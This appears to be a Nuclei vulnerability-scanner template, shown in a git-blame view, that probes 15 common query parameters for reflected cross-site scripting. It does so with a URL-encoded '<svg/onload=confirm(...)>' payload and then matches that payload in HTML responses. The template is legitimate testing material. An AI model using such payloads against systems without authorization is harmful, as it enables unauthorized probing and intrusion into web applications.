2020-08-15 08:48:23 +00:00
|
|
|
# id contains the unique identifier for the template.
|
|
|
|
id: top-15-xss
|
|
|
|
|
|
|
|
info:
|
|
|
|
# Name is the name of the template
|
|
|
|
name: Top 15 XSS Check
|
|
|
|
# Author is the name of the author for the template
|
|
|
|
# Prams:- q, s, search, id, action, keyword, query, page, keywords, url, view, cat, p
|
|
|
|
author: foulenzer
|
|
|
|
# Severity is the severity for the template.
|
|
|
|
severity: medium
|
|
|
|
# Description optionally describes the template.
|
|
|
|
description: Searches for reflected XSS in the server response via GET-requests.
|
|
|
|
|
|
|
|
requests:
|
|
|
|
- method: GET
|
|
|
|
path:
|
2020-09-04 07:29:18 +00:00
|
|
|
- "{{BaseURL}}/?q=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss%27%29%3E&s=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss%27%29%3E&search=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss%27%29%3E&id=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss%27%29%3E&action=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss%27%29%3E&keyword=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss%27%29%3E&query=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss%27%29%3E&page=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss%27%29%3E&keywords=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss%27%29%3E&url=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss%27%29%3E&view=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss%27%29%3E&cat=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss%27%29%3E&name=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss%27%29%3E&key=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss%27%29%3E&p=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss%27%29%3E"
|
2020-09-04 07:49:39 +00:00
|
|
|
matchers-condition: and
|
2020-08-15 08:48:23 +00:00
|
|
|
matchers:
|
|
|
|
- type: word
|
|
|
|
words:
|
|
|
|
- "<svg/onload=confirm('testing-xss')>"
|
2020-09-04 07:46:30 +00:00
|
|
|
part: body
|
|
|
|
- type: word
|
|
|
|
words:
|
|
|
|
- "text/html"
|
|
|
|
part: header
|